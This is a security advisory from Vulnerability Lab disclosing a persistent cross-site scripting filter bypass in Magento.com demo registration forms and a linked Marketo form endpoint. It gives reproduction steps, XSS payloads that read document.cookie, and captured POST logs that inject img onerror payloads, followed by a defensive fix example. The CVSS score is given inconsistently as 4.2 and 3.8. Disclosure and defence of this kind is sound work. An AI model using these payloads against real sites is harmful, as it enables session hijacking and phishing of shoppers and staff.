Document Title:
===============
Magento Products T1 - Bypass & Persistent Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1919
Release Date:
=============
2018-06-19
Vulnerability Laboratory ID (VL-ID):
====================================
1919
Common Vulnerability Scoring System:
====================================
4.2
Vulnerability Class:
====================
Cross Site Scripting - Persistent
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
Magento is an open source e-commerce web application that was launched on March 31, 2008 under the name Bento. It was developed
by Varien (now Magento, a division of eBay) with help from the programmers within the open source community but is now owned
solely by eBay Inc. Magento was built using parts of the Zend Framework. It uses the entity-attribute-value (EAV) database model
to store data. In November 2013, W3Techs estimated that Magento was used by 0.9% of all websites.
Our team of security professionals works hard to keep Magento customer information secure. What's equally important to protecting
this data? Our security researchers and user community. If you find a site that isn't following our policies, or a vulnerability
inside our system, please tell us right away.
( Copy of the Vendor Homepage: http://magento.com/security )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory core research team discovered an application-side validation and filter bypass vulnerability in the Magento Products tier 1 application.
Vulnerability Disclosure Timeline:
==================================
2018-06-20: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Magento
Product: Magento - Web Application Service 2016 Q3
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Open Authentication (Anonymous Privileges)
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Responsible Disclosure
Technical Details & Description:
================================
A filter bypass and persistent mail-encoding vulnerability has been discovered in the official Magento demo service on tier 1 (sender: [email protected]).
The vulnerability allows remote attackers to bypass the validation procedure of the main Magento tier 1 application and to execute persistent script code
in the affected modules or functions.
The Magento online service web application on tier 1 allows script code to be injected as values into the database. An internal employee then takes this
stored information and encodes a link for a permanent registration via the Magento customer HTML database. The imported/exported database content is parsed
incorrectly and is sent, through the registration form of the Magento website, to the inbox of the follow-up request. Normally the validation rejects payloads,
whether inserted directly or generated by the form, to prevent malicious interaction. In the case of the new website module on tier 1, the employee acting via
the web application performs the encoding of the context. Afterwards the attacker holds a valid registration link on the email2 server (http://email2.magento.com/)
with the malicious id CGP00H0dX0FG0qs32402D01. This id can be used to issue the same malicious request to all email servers that Magento uses and that are
connected to the technology, thus affecting both the tier 1 and tier 2 web applications of Magento. The resulting email is sent from the main [email protected]
address on tier 1, and the validation runs through the basic tier 1 infrastructure of Magento as well.
The leadCapture/save bug in Marketo has already been reported, with a bounty, by our core team. This issue refers mainly to the filter bypass that results in the
follow-up exploitation. The two cases should be resolved and recognized separately.
The security risk of the application-side web vulnerability is estimated as medium with a CVSS (Common Vulnerability Scoring System) count of 3.8.
Exploitation of the application-side validation web vulnerability requires no privileged web-application user account and only low user interaction.
Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent redirects to external sources and
persistent manipulation of the context of affected or connected service modules.
Request Method(s):
[+] [POST]
Vulnerable Domain(s):
[+] Magento (.com) - Tier 1
Vulnerable Module(s):
[+] Magento Product Demo Registration Forms
[+] Magento Email Registration Link
Vulnerable Parameter(s):
[+] firstname
[+] lastname
Affected Module(s):
[+] Magento Tier 1 - join us for a Magento 2.1 demo next week
[+] Magento Tier 2 - All contact form masks with the same conditions to generate the reg id link
Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers without a privileged web-application user account and with low user interaction.
For security demonstration or to reproduce the vulnerability, follow the information and steps provided below.
Manual steps to reproduce the vulnerability ...
1. Register for the main service with a script code payload in the firstname and lastname values
2. Wait for the link to be generated by the moderating employee "Brian Benic"
Note: On generation the saved values are attached to the id request without secure validation
3. Open the target inbox of the registration; the first execution occurs in the mail body next to the introduction words
4. Click the generated link in the email (e.g. http://email2.magento.com/CGP00H0dX0FG0qs32402D01)
5. The payload is now loaded from the database without secure parsing and can be inserted a second time into the next form request
6. Check the target inbox after the second registration and see that the same issue occurs again, via the filter bypass, in another form as well
Note: Attackers can now use the id of the email2 subdomain to issue the same malicious request in other contact forms connected to Magento
7. Successful reproduction of the remote vulnerability in two different stages of the Magento tier 1 application!
PoC: Payload Example
"><iframe src="evil.source" onload=alert(document.cookie) <%20<iframe>
"><img src="evil.source" onload=alert(document.cookie) <%20<iframe>
PoC: Exploitation (Registration Payload - Filter Bypass of Validation Mechanism)
http://email2.magento.com/CGP00H0dX0FG0qs32402D01
PoC: Exploitation (Inputs)
https://magento.com/campaign/see-a-demo-wtd
https://magento.com/campaign/see-a-demo-wtd?submitted=1
Malicious ID:
CGP00H0dX0FG0qs32402D01
--- PoC Session Logs [POST] ---
Status: 200[OK]
POST https://app-sj16.marketo.com/index.php/leadCapture/save2
Mime Type[application/json]
Request Header:
Host[app-sj16.marketo.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0]
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
X-Requested-With[XMLHttpRequest]
Referer[https://app-sj16.marketo.com/index.php/form/XDFrame]
Cookie[BIGipServersj16web-app_https=!lW9zkuuUdXHSCnzScTwF7CR830iJc0t0NTeHy2Dndw9MiEwLruc36CwY3U110NW9NpeNiOdwgLsL2L0=]
POST-Daten:
flexStringEvent[Magento%202.1%20Demo%20on%20August%2031%2C%202016%20at%207%3A30am%20PT%20%2F%202%3A30pm%20GMT]
FirstName[%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt(23)%3B%3E%20%20%20%22%3E%3Ci]
LastName[%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt(23)%3B%3E%20%20%20%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt(23)%3B%3E%3Ciframe%20sr]
Email[research%40vulnerability-lab.com]
Company[%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt(23)%3B%3E%20%20%20%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt(23)%3B%3E%3Ciframe%20src%3D%22x%22%3E%20%20%20%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt(23)%3B%3E%20%20%20%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt(23)%3B%3E%3Ciframe%20src%3D%22x%22%3E]
LeadSource[Magento%20Website]
Lead_Source_Description__c[Demo%20-%20Enterprise]
marketing_campaign__c[]
marketing_medium__c[]
marketing_source__c[]
marketing_term__c[]
Phone[31337]
Organizational_Role__c[Merchant%2FRetailer%20(Enterprise%20Edition)]
have_online_store[Yes]
formid[2005]
munchkinId[585-GGD-959]
_mkt_trk[id%3A585-GGD-959%26token%3A_mch-magento.com-1471590610172-56988]
formVid[2005]
mkt_tok[eyJpIjoiTUdKbU1UTm1OR0ZtTUdJMyIsInQiOiJoeEErZDRcL2pacGZsVisxbW01T0xDaXo0ZlwveXFSVm41WmZOVzlHc1FVU2J2RmpHRXBqRHIwdXNSMmFDaFVlZXlacytIc0h2TkIwT2dXcENQNWRUOGdKSFFOYXRSa2tHWlNqZ2pLbjN4UnVBPSJ9]
_mktoReferrer[https%3A%2F%2Fmagento.com%2Fcampaign%2Fsee-a-demo-wtd%3Fmkt_tok%3DeyJpIjoiTUdKbU1UTm1OR0ZtTUdJMyIsInQiOiJoeEErZDRcL2pacGZsVisxbW01T0xDaXo0ZlwveXFSVm41WmZOVzlHc1FVU2J2RmpHRXBqRHIwdXNSMmFDaFVlZXlacytIc0h2TkIwT2dXcENQNWRUOGdKSFFOYXRSa2tHWlNqZ2pLbjN4UnVBPSJ9]
Response Header:
Server[Apache]
access-control-allow-origin[*]
Vary[Accept-Encoding]
Content-Type[application/json; charset=utf-8]
Connection[keep-alive]
-
Status: 200[OK]
GET https://magento.com/campaign/see-a-demo-wtd?submitted=1
Mime Type[text/html]
Request Header:
Host[magento.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Referer[https://magento.com/campaign/see-a-demo-wtd?mkt_tok=eyJpIjoiTUdKbU1UTm1OR0ZtTUdJMyIsInQiOiJoeEErZDRcL2pacGZsVisxbW01T0xDaXo0ZlwveXFSVm41WmZOVzlHc1FVU2J2RmpHRXBqRHIwdXNSMmFDaFVlZXlacytIc0h2TkIwT2dXcENQNWRUOGdKSFFOYXRSa2tHWlNqZ2pLbjN4UnVBPSJ9]
Cookie[has_js=1; _ga=GA1.2.11845812.1471590610; _mkto_trk=id:585-GGD-959&token:_mch-magento.com-1471590610172-56988; _gat=1; _ceg.s=oc5aky; _ceg.u=oc5aky; optimizelyEndUserId=oeu1471590610390r0.9771229814229521; optimizelySegments=%7B%22237962548%22%3A%22ff%22%2C%22238367687%22%3A%22false%22%2C%22239237138%22%3A%22direct%22%7D; optimizelyBuckets=%7B%7D; _gali=mktoForm_2005]
Connection[keep-alive]
Response Header:
Cache-Control[public, max-age=86400]
Content-Type[text/html; charset=utf-8]
Etag["1471590692-1"]
Link[<https://magento.com/campaign/see-a-demo-wtd>; rel="canonical",<https://magento.com/node/1851>; rel="shortlink"]
Server[nginx]
Strict-Transport-Security[max-age=86400]
Vary[Cookie, Accept-Encoding]
X-Frame-Options[SameOrigin, SAMEORIGIN]
Connection[keep-alive]
Reference(s):
http://email2.magento.com/
http://email2.magento.com/CGP00H0dX0FG0qs32402D01
https://magento.com/
https://magento.com/campaign/
https://magento.com/campaign/see-a-demo-wtd
https://magento.com/node/
Solution - Fix & Patch:
=======================
The security vulnerability can be patched by securely parsing the email2 id parameter in the magento.com GET request.
Disallow the use of special characters and parse the values during the performed request to prevent an execution or injection.
Parse the follow-up registration id request to the email2 server as well to patch the issue permanently.
The issue on the Marketo side was resolved in 2017 Q2-Q4. The issue in the Magento service, which does not perform a
secure validation process at the hand-over, was resolved in 2017 Q3-Q4.
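As an added illustration of the fix described above (example code, not part of the original advisory and not Magento's or Marketo's own code): the stored name fields are checked on input and HTML-encoded wherever they are placed into the mail body or the pre-filled follow-up form, and the email2 id is constrained to the plain alphanumeric shape of the id quoted in this advisory. The template strings, function names and the NAME_RE / REG_ID_RE policies are assumptions; the FirstName value is the URL-encoded one from the POST log.

```python
import html
import re
from urllib.parse import unquote

# Constructed sample input: the FirstName value from the advisory's POST log, still URL-encoded.
ENCODED_FIRSTNAME = "%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt(23)%3B%3E%20%20%20%22%3E%3Ci"
REG_ID = "CGP00H0dX0FG0qs32402D01"  # the email2 registration id quoted in the advisory

# Assumed policies (not Magento's or Marketo's): a name may not carry control characters,
# angle brackets, quotes, ampersands or path/attribute delimiters; an id is plain alphanumeric.
NAME_RE = re.compile(r'^[^\x00-\x1f<>"&=/\\]{1,64}$')
REG_ID_RE = re.compile(r'^[A-Za-z0-9]{8,32}$')

def decoded_firstname() -> str:
    """The payload as the leadCapture/save2 endpoint would see it after URL-decoding."""
    return unquote(ENCODED_FIRSTNAME)

def validate_name(value: str) -> bool:
    """Input-side check run on the registration POST before anything is stored."""
    return NAME_RE.fullmatch(value) is not None

def validate_reg_id(value: str) -> bool:
    """Check applied to the id in the follow-up GET to email2 before it is looked up."""
    return REG_ID_RE.fullmatch(value) is not None

def render_email_vulnerable(first: str, last: str, reg_id: str) -> str:
    """Mirror of the flawed flow: stored values concatenated into the mail body unencoded."""
    return (f"<p>Hello {first} {last}, join us for the demo:</p>"
            f'<a href="http://email2.magento.com/{reg_id}">Confirm registration</a>')

def render_email_hardened(first: str, last: str, reg_id: str) -> str:
    """Output-side fix: HTML-encode every stored value at the point it enters the mail body."""
    return (f"<p>Hello {html.escape(first)} {html.escape(last)}, join us for the demo:</p>"
            f'<a href="http://email2.magento.com/{html.escape(reg_id, quote=True)}">'
            "Confirm registration</a>")

def render_followup_form_hardened(first: str, last: str) -> str:
    """Pre-filled follow-up form: values sit inside quoted attributes, so quotes must be encoded too."""
    return (f'<input name="FirstName" value="{html.escape(first, quote=True)}">'
            f'<input name="LastName" value="{html.escape(last, quote=True)}">')

def contains_active_markup(rendered: str) -> bool:
    """Crude check used here only to show which rendering still carries the injected tags."""
    lowered = rendered.lower()
    return "<img" in lowered or "<iframe" in lowered

if __name__ == "__main__":
    first = decoded_firstname()
    print("name accepted by validation:", validate_name(first))
    print("vulnerable mail carries markup:", contains_active_markup(render_email_vulnerable(first, "Doe", REG_ID)))
    print("hardened mail carries markup:", contains_active_markup(render_email_hardened(first, "Doe", REG_ID)))
```

Both layers matter: the input check alone would not protect values already sitting in the database, and the output encoding alone leaves the stored record polluted for every other form that reads it.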
Security Risk:
==============
The security risk of the application-side issue and filter bypass vulnerability in the Magento tier 1 web application is estimated as medium (CVSS 3.8).
Credits & Authors:
==================
Vulnerability Laboratory [Core Research Team] - ([email protected]) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or
implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any
case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its
suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental
or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface
websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories
or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails,
phone numbers, conversations or anything else to journalists, investigative authorities or private individuals.
Domains: www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Any modified copy or reproduction, including partial usage, of this file, resources or information requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website are trademarks
of the vulnerability-lab team and the specific authors or managers. To record, list, modify, use or edit our material, contact (admin@) to ask for permission.
Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™